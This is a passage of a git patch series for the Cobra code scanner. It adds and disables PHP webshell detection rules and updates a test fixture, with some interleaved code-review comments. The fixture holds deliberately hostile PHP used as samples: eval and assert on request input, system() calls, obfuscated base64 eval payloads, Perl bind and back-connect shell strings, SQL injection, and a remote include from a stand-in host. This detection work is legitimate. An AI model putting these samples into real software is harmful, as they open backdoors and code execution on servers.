0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); - } else { - echo 'Error opening sqlite db: ' . $sqliteerror;exit; - } - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml deleted file mode 100644 index ee83be9c..00000000 --- a/rules/CVI-360023.xml +++ /dev/null @@ -1,16 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell23"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match> - <level value="7"/> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml deleted file mode 100644 index 14a7e530..00000000 --- a/rules/CVI-360024.xml +++ /dev/null @@ -1,19 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell24"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml deleted file mode 100644 index a88c4111..00000000 --- a/rules/CVI-360025.xml +++ /dev/null 
@@ -1,19 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell25"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\)]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index 61dd65ef..8a1c8ae4 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\()]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[assert($_SERVER["REQUEST_URI"]);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index 265c9dbc..c9bf22ca 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml 
@@ -4,10 +4,22 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg..."; + ]]></case> + <case assert="true"><![CDATA[$result = python_eval("import os\nos.system('$cmd')");]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/knullsh.txt) + + 特征 `python_eval("import os\nos.system(` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/bdotw44shell.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index 2ac9f909..1b554b4d 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml 
@@ -4,10 +4,18 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2..."; + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/138shell/N/NIX%20REMOTE%20WEB-SHELL%20v.0.5%20alpha%20Lite%20Public%20Version.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 14ae5598..ccac7a18 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml 
@@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell33"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux 
Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 1fae15ff..bbbb6f88 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -8,16 +8,13 @@ $cmd = $_REQUEST['a']; echo ($callback . ";"); -echo $callback; extract($cmd); - -@array_map("ass\x65rt", (array) @$cmd); +eval($cmd); $cmd = $_GET['cmd']; if (!empty($cmd)) { - eval($cmd); system('ls'+$cmd); } @@ -56,8 +53,6 @@ function curl($url) { echo get_headers($url, 1); } -print("Hello " . $cmd); - $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; mysql_query($query); mysqli_query($query); @@ -100,12 +95,10 @@ function curl($url) { unlink($file); } -header("Location: " . $_GET["url"]); - $host = $_POST['host']; $port = $_POST['port']; function GetFile($host, $port, $link) { - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); if (!$fp) { echo "$errstr (error number $errno) \n"; } else { @@ -153,10 +146,6 @@ function GetFile($host, $port, $link) { //cvi-360006 ($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); -//cvi-360007 -//call_user_func('assert', $_REQUEST['pass']); //这种和参数可控重复 同理加密的字符串检测不出来 -//call_user_func('assert', $arr); - //cvi-360008 $a = 'assert'; call_user_func($a, $arr); 
@@ -177,22 +166,14 @@ function GetFile($host, $port, $link) { $sa = create_function('xxx', "eval()");$sa(); //cvi-360012 -$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));');$func($_GET['func']); +$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));'); $func($_GET['func']); //cvi-360013 -//$id = $_GET['id'];$q = 'echo' . $id . 'is' . $a . ";";$sy = create_function('$a', $q); $sa = "eval()"; create_function('xxx', $sa); //cvi-360014 $a = "eval";$a($_GET['a']); -//cvi-360015 感觉有误报的 -if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); -} else { - echo 'Error opening sqlite db: ' . $sqliteerror;exit; -} - //cvi-360016 filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); @@ -217,6 +198,9 @@ function GetFile($host, $port, $link) { ini_set('allow_url_include, 1'); // Allow url inclusion in this script include 'php://input'; +//cvi-360027 +assert($_SERVER["REQUEST_URI"]); + //cvi-360026 $cb = 'system'; ob_start($cb); @@ -227,8 +211,20 @@ function GetFile($host, $port, $link) { eval(base64_decode( ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); -//cvi-360032 -//<div class = bartitle><h4> '.sh_name().' </h4> .:r57 . bizDq99Shell:.</div> +//cvi-360029 +$bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg..."; + +//cvi-360030 +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2..."; + +//cvi-360031 +function zWM($NXlKO){ + $NXlKO=gzuncompress(base64_decode($NXlKO)); + for($i=0;$i<strlen($NXlKO);$i++){ + $NXlKO[$i] = chr(ord($NXlKO[$i])-1); + } + return $NXlKO; +} //cvi-360033 $shver = "Emp3ror Undetectable #18"; //Current version 
@@ -249,3 +245,7 @@ function GetFile($host, $port, $link) { $a = 'assert'; $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort($a); + +//cvi-360037 +$a="http://www.test.com/sss.php"; +require_once $a; \ No newline at end of file From 966a393dd92af3df2dc9e4b6170458d24d2ef21a Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Tue, 12 Sep 2017 10:04:56 +0800 Subject: [PATCH 27/29] change status of some rules to `off` --- rules/CVI-360003.xml | 2 +- rules/CVI-360008.xml | 2 +- rules/CVI-360009.xml | 2 +- rules/CVI-360010.xml | 2 +- rules/CVI-360017.xml | 2 +- rules/CVI-360019.xml | 2 +- rules/CVI-360022.xml | 2 +- rules/CVI-360026.xml | 2 +- rules/CVI-360027.xml | 1 + rules/CVI-360032.xml | 5 ++++- rules/CVI-360036.xml | 2 +- rules/CVI-360037.xml | 2 +- tests/vulnerabilities/v.php | 27 +++++++++++++++++++++------ 13 files changed, 36 insertions(+), 17 deletions(-) diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml index f3cc59f4..c5eba2c8 100644 --- a/rules/CVI-360003.xml +++ b/rules/CVI-360003.xml @@ -14,6 +14,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml index 2524f03a..bf4d99c2 100644 --- a/rules/CVI-360008.xml +++ b/rules/CVI-360008.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml index aa311c3e..5fb520a0 100644 --- a/rules/CVI-360009.xml +++ b/rules/CVI-360009.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 274fff85..a5e2c432 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml 
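Review bot: The CVI-360003 hunk flips `<status value="on"/>` to `<status value="off"/>` with no record of why, and the same flip is applied to nine other webshell rules in this patch while the title says only that statuses change. A disabled rule is a detection gap, so each should carry the reason inline, e.g. a line in `<solution>` such as `Disabled: high false-positive rate; see tests/vulnerabilities/v.php`, or at least the commit message should name the false positives that drove it. The fixture earlier in this series marked 360015 as noisy before that rule was deleted; the same practice here would let a later maintainer decide whether to re-enable these.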
@@ -21,6 +21,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index 72325724..ae7ee7bc 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index 6d8df0af..516085b2 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index c5bf35b3..8885040b 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml index e8d8ef15..14f10b86 100644 --- a/rules/CVI-360026.xml +++ b/rules/CVI-360026.xml @@ -31,6 +31,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index 8a1c8ae4..be561ef8 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -6,6 +6,7 @@ <level value="7"/> <test> <case assert="true"><![CDATA[assert($_SERVER["REQUEST_URI"]);]]></case> + <case assert="true"><![CDATA[eval(getenv('HTTP_CODE'));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index cf5f9d23..f29528e8 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml 
@@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell"/> + <name value="webshell32"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]>
@@ -16,6 +16,9 @@ 特征 `dQ99shell` 对应webshell样例 [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/%E5%9B%BD%E5%A4%96%E5%85%8D%E6%9D%80PHP%E5%A4%A7%E9%A9%AC_%E6%9C%AA%E7%BF%BB%E8%AF%91.php) + 特征 `c999shexit` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/c99-bd.txt) + ## 修复方案 删除
diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml index 890ad34d..aeb85c77 100644 --- a/rules/CVI-360036.xml +++ b/rules/CVI-360036.xml @@ -18,6 +18,6 @@ ## 修复方案 删除
- +
diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml index db28b4e8..89a2da81 100644 --- a/rules/CVI-360037.xml +++ b/rules/CVI-360037.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 - +
diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index bbbb6f88..e4d95c7b 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -7,8 +7,6 @@ $cmd = $_REQUEST['a']; -echo ($callback . ";"); - extract($cmd); eval($cmd); @@ -53,7 +51,9 @@ function curl($url) { echo get_headers($url, 1); } -$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; +$size = $_GET['size']; +$order = $_GET['order']; +$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order;"; mysql_query($query); mysqli_query($query); @@ -95,8 +95,7 @@ function curl($url) { unlink($file); } -$host = $_POST['host']; -$port = $_POST['port']; +//cvi-120004 function GetFile($host, $port, $link) { $fp = fsockopen($host, intval($port), $errno, $errstr, 30); if (!$fp) { @@ -116,6 +115,12 @@ function GetFile($host, $port, $link) { return $contents; } } +$host = $_POST['host']; +$port = $_POST['port']; +GetFile($host, $port, $link); + +//cvi-120004 +$fp = fsockopen($host, intval($port), $errno, $errstr, 30); //cvi-165001 $surname = $_GET['surname']; @@ -146,6 +151,9 @@ function GetFile($host, $port, $link) { //cvi-360006 ($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); +//cvi-360007 +call_user_func('assert', $arr); + //cvi-360008 $a = 'assert'; call_user_func($a, $arr); @@ -199,7 +207,7 @@ function GetFile($host, $port, $link) { include 'php://input'; //cvi-360027 -assert($_SERVER["REQUEST_URI"]); +eval(getenv('HTTP_CODE')); //cvi-360026 $cb = 'system'; @@ -226,6 +234,13 @@ function zWM($NXlKO){ return $NXlKO; } +//cvi-360032 +function c999shexit() +{ + onphpshutdown(); + exit; +} + //cvi-360033 $shver = "Emp3ror Undetectable #18"; //Current version //CONFIGURATION AND SETTINGS From ac61bd5c91192c3c54bceb024384fe31f868aad5 Mon Sep 17 00:00:00 2001 
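Review bot: In the `@@ -116,6 +115,12 @@` hunk the new top-level call `GetFile($host, $port, $link);` passes `$link`, which is not assigned anywhere in the hunk; unless it is defined earlier in the file, PHP will raise an undefined-variable notice and the function will request an empty path. The same change also leaves two `//cvi-120004` markers, one above `function GetFile(...)` in the `@@ -95,8 +95,7 @@` hunk and one above the standalone `fsockopen(...)` line, whereas every other marker in this file precedes exactly one sample, so the expected hit count for that rule is ambiguous. Suggest dropping the marker above the function definition and adding `$link = $_POST['link'];` beside the other two assignments so the sample is a complete user-controlled-input chain, like the `$size`/`$order` sample added in the `@@ -53,7 +51,9 @@` hunk. The body of `GetFile` lies outside the hunk.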
From: Feei Date: Tue, 12 Sep 2017 11:02:52 +0800 Subject: [PATCH 28/29] improves config tooltip --- cobra/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cobra/config.py b/cobra/config.py index 082f9a05..659ce795 100644 --- a/cobra/config.py +++ b/cobra/config.py @@ -70,7 +70,7 @@ def __init__(self, level1=None, level2=None): value = config.get(level1, level2) except Exception as e: traceback.print_exc() - logger.critical("./configs file configure failed.\nError: {0}".format(e.message)) + logger.critical("./configs file configure failed. {u}\nError: {e}".format(u='https://wufeifei.github.io/cobra/config', e=e.message)) self.value = value @staticmethod From a60cd602894f613d9ca66ff35b727302416d6eb2 Mon Sep 17 00:00:00 2001 From: Feei Date: Tue, 12 Sep 2017 11:08:45 +0800 Subject: [PATCH 29/29] Released v2.0.0-alpha.4 --- CHANGES.md | 9 +++++++++ cobra/__version__.py | 2 +- 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/CHANGES.md b/CHANGES.md index f6f09a75..f996f6f6 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -3,6 +3,15 @@ Cobra Changelog Here you can see the full list of changes between each Cobra release. +Version 2.0.0-alpha.4 +--------------------- + +Released on Sep 12 2017 + +- 增加WebShell规则和测试用例 #571 +- 支持FPC模式修复函数 #565 #559 +- 其它细节优化和Bug修复 + Version 2.0.0-alpha.3 --------------------- diff --git a/cobra/__version__.py b/cobra/__version__.py index df73639c..e5bb4536 100644 --- a/cobra/__version__.py +++ b/cobra/__version__.py @@ -7,7 +7,7 @@ __issue_page__ = 'https://github.com/wufeifei/cobra/issues/new' __python_version__ = sys.version.split()[0] __platform__ = platform.platform() -__version__ = '2.0.0-alpha.3' +__version__ = '2.0.0-alpha.4' __author__ = 'Feei' __author_email__ = 'feei@feei.cn' __license__ = 'MIT License'
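Review bot: The rewritten `logger.critical(...)` line still formats `e.message`, an attribute that `BaseException` does not have on Python 3, so under Python 3 the `except` handler would itself raise `AttributeError` and hide the original configuration error; the commit edits this line but leaves that intact. Passing the exception directly, `e=e` (or `e=str(e)`), formats the same text on both Python versions. Since the handler already calls `traceback.print_exc()`, `logger.exception(...)` would also keep the traceback in the log rather than only on stderr. The enclosing `__init__` starts before this hunk, so whether `value` is initialised before the `try` (it is assigned to `self.value` right after the handler) cannot be seen here.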